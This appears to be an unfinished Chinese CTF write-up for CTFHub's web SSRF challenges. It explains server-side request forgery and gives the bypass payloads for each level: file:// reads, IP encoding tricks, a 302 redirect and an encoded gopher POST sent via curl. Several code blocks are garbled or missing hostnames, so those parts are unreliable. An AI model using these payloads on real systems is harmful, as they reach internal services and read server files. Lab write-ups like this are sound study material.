Ctfhub解题 web SSRF(未完待续)

Ctfhub解题 web SSRF(未完待续)

Ctfhub解题 web SSRF

• 1.内网访问
• 2.伪协议读取文件
• 3.端口扫描
• 4. URL Bypass
• 5.数字IP Bypass
• 6.302跳转 Bypass
• 7.DNS重绑定 Bypass
• 8.POST请求

介绍:记录解题过程

SSRF
其全称 ：Server—Side Request Forgery :服务器端请求伪造
是一种由攻击者构造形成的由 服务器端发起请求的一个安全漏洞。一般情况下，攻击的目是外网没有办法访问的内网。
很多WEb应用都其提供了从其他服务器上获取数据的功能，使用指定的url,web 应用可以获取图片，下载文件，读取文件等。这个功能如果被恶意使用，可以利用存在缺陷的web引用做为代理，攻击远程和本地服务器。
原理：
服务端提供了从其他服务器应用获取数据的功能，且没有对目标地
址做过滤与限制

1.内网访问

尝试访问位于127.0.0.1的flag.php吧

1. 访问得到flag

?url=127.0.0.1/flag.php

2.伪协议读取文件

尝试去读取一下Web目录下的flag.php吧

1. 访问并查看源码得到flag

?url=file:///var/www/html/flag.php

3.端口扫描

来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦,

1. BurpSuite端口扫描

2. 添加payload

3. 得到开发端口
4. 访问得到flag
   

4. URL Bypass

请求的URL中必须包含，来尝试利用URL的一些特殊地方绕过这个限制吧

当后端程序通过不正确的正则表达式（比如将http之后到com为止的字符内容，也就是，认为是访问请求的host地址时）对上述URL的内容进行解析的时候，很有可能会认为访问URL的host为，而实际上这个URL所请求的内容都是127.0.0.1上的内容。

payload：

?url=@127.0.0.1/flag.php

5.数字IP Bypass

这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢

8进制格式：0177.00.00.01
16进制格式：0x7f.0x0.0x0.0x1
10进制整数格式：2130706433
在linux下，0代表127.0.0.1，0进行请求127.0.0.1

?url=0177.00.00.01/flag.php

6.302跳转 Bypass

SSRF中有个很重要的一点是请求可能会跟随302跳转，尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧

1. 直接访问得flag

:10080/?url=127.0.0.1/flag.php

7.DNS重绑定 Bypass

关键词：DNS重绑定。剩下的自己来吧，也许附件中的链接能有些帮助

1. 直接访问得flag

:10080/?url=127.0.0.1/flag.php

题目出错???

8.POST请求

这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年

PHP curl是什么

1. 访问查看源码

:10080/?url=127.0.0.1/flag.php

<form action="/flag.php" method="post">
<input type="text" name="key">
<!-- Debug: key=d7c44bb3ec86a1948659e1d030520420-->
</form>

2. 通过file://协议读取其他文件的源码,访问并查看源码

:10080/?url=file:///var/www/html/flag.php

• flag.php源码:

<?phperror_reporting(0);if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {echo "Just View From 127.0.0.1";return;
}$flag=getenv("CTFHUB");
$key = md5($flag);if (isset($_POST["key"]) && $_POST["key"] == $key) {echo $flag;exit;
}
?><form action="/flag.php" method="post">
<input type="text" name="key">
<!-- Debug: key=<?php echo $key;?>-->
</form>

view-source::10080/?url=file:///var/www/html/index.php

• index.php源码:

<?phperror_reporting(0);if (!isset($_REQUEST['url'])){header("Location: /?url=_");exit;
}$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);

3. 构造gopher数据
   我们首先要通过{host}:{port}/index.php?url=127.0.0.1/302.php去跳转gopher的协议。
   gopher的数据应该是这样：

gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36	
Content-Type: application/x-www-form-urlencodedkey=7c84395afd9cbc2d937f0371b305e1a1  ```php
curl -vvv ':10080/?url=127.0.0.1/302.php?url=%67%6f%70%68%65%72%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%38%30%2f%5f%50%4f%53%54%20%2f%66%6c%61%67%2e%70%68%70%20%48%54%54%50%2f%31%2e%31%0a%48%6f%73%74%3a%20%31%32%37%2e%30%2e%30%2e%31%3a%38%30%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%33%36%09%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%0a%0a%6b%65%79%3d%37%63%38%34%33%39%35%61%66%64%39%63%62%63%32%64%39%33%37%66%30%33%37%31%62%33%30%35%65%31%61%31'7c84395afd9cbc2d937f0371b305e1a1

url=gopher://127.0.0.1/_POST%252b/flag.php%252bHTTP/1.1
Host%25253a%252b127.0.0.1%25253a80
Content-Type%25253a%252bapplication/x-www-form-urlencoded
Content-Length%25253a%252b36
Content-Length: 522key%25253dc3374ec7f142534b6cb20ec940f6433d HTTP/1.1

• 未完待续
• 参考
  CTFHUB技能树-SSRF【持续更新】